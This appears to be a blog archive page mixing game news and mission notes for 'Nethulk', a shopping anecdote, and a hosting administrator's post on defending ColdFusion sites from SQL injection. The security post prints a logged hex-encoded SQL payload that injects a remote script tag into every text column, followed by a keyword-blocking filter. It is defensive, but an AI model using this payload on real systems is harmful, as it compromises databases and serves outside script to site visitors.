Since writing some material for the Nethulk FAQ a few weeks ago, I’ve been afforded a sneak peak into an upcoming release of Nethulk, and this one is packed with new content. Amber, the creator of Nethulk, has been busy programming and playtesting since the 1.57 release. She has added an additional playable faction, the Invaders. They’re a cybernetic race with advanced technological abilities. Foremost among these is the ability to ’summon’ units by playing cards similar to the psychic ability cards already in the game.
The Invaders are really something novel for the game, and I found them refreshing to play. Their leader unit uses the summoning abilities, and can summon whatever the player has drawn cards for and has the points to play. If that wasn’t unique enough, it can do this also by using ‘relays’, another type of unit that extends the summoning range of the leader. It can summon units to the relay, which is a highly mobile unit that can hide out and gather forces to whatever point on the map it can reach.
The Invaders aren’t the only new things coming with 1.58. Amber has also added additional high-point Valkyries. A elite force of 5 Valkyrie warriors worth 8 points each, and all with unique and interesting abilities. I won’t spoil too much about the abilities, as Amber says she’s still working on game balance issues and that they may change before 1.58 is official.
Be looking for the release early in 2009, it’ll be well worth the wait.
nethulk
A while back, there was an internet worm, or an extremely prodigious hacker, hacking sites through sql injection to place links to a chinese spam site. It was really frustrating, because it targetting cold fusion sites and we host a lot of those.
Here’s an example of how these attacks looked in the logfiles:
;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
Well, we ended up finding two lines to place into our Application.cfm files to stop it. Basically, it looks at the query string and aborts if it finds an EXEC or CAST in it. Simple and effective:
<cfif cgi.SCRIPT_NAME contains “EXEC(” OR cgi.PATH_INFO contains “EXEC(” OR cgi.QUERY_STRING contains “EXEC(”><cfabort></cfif>
I paste that line in a few times and change “EXEC(” to “CAST(” and “DECLARE(”, and to anything else that happens to be something I’m not going to use and might be dangerous.
The real solution, of course, is to write good code. Use cfqueryparam with maxlength set. Best practices are something I can use when I code, but as we host code that our users write or download, its impossible for me to make sure all of their code is secure. I can, however, write a few lines into the top of their application.cfm’s to protect our sql servers.
Programming, Technology code, coldfusion, sql injection
I’ve just gotten back from a long break for Thanksgiving, five days off from work. Of course, black friday doorbuster shopping is one of the traditions in my family. My mom and I do it every year. Where we live, there were no horrible tramplings like the wal-mart employee that died when customers broke down the doors and rushed the store. We had long lines, but it was courteous and friendly the whole way through. This year we hit the Belks doorbusters first, as they were giving away gift-cards to the first 250 customers that came to the store. My mom and I both got five dollars. Not alot, but last year they did the same thing and I ended up getting a $100 gift card, and bought most of my christmas presents for others with it. Its amazing how many thumbdrives and mp3 players you can get for that, and they make such great gifts.
Speaking of thumbdrives and memory cards and mp3 players, that’s what most of the stores that carried electronics seemed to be pushing this year. Cheap flash memory devices. Its a shame I got those for everyone last year, so I can’t give them as gifts again so soon. I got a ton of them for myself though. My cell phone, my laptop, everything I own that takes flash memory or sd cards got a new card, most of them for five or ten dollars. I dub this the year of cheap flash.
Shopping
Mission 5
Mission 5 Map
In mission 5, five marines start in each of two deployment areas. Of the starting ten, five have to escape alive. Its may sound easy, but there are long corridors and choke points that make this a very challenging map.
The blip faction may be played as orks or aliens, with any of the available starting configurations.
nethulk
Flame outs are about reaching an objective room and using a flame based weapon to burn all target squares. The blip faction tries to prevent the advancing troops from reaching this objective room, or to eliminate the flamers. The attacking team will lose if all of the flamers go down, or if they do not have enough flamer ammo to complete the mission.
Mission 1 Map
Mission 1 is a well balanced and quick flame-out mission, and can be an excellent first mission to try for new players. The typical point balance is 10 points for marines aganist a 2 exp blip alien. Game time is 10-15 minutes.
Variations include orks or ancients as the blip faction, with valyries available to stand in for the marines.
Added in 1.58 is an expanded selection of blips for the ork faction.
Skirmish 2 is longer than Mission 1 with a larger map that can lead to more varied strategies, but still has a single objective room. Its suggested for players that are comfortable with the game and can turn quickly.
Mission 4 is a two-squad advance down a set of double hallways with two objective rooms at the end. Marines start with two squads, so 20 points for marines will yield two squads at mission one balance, matched for 3 exp or 2 max blips.
nethulk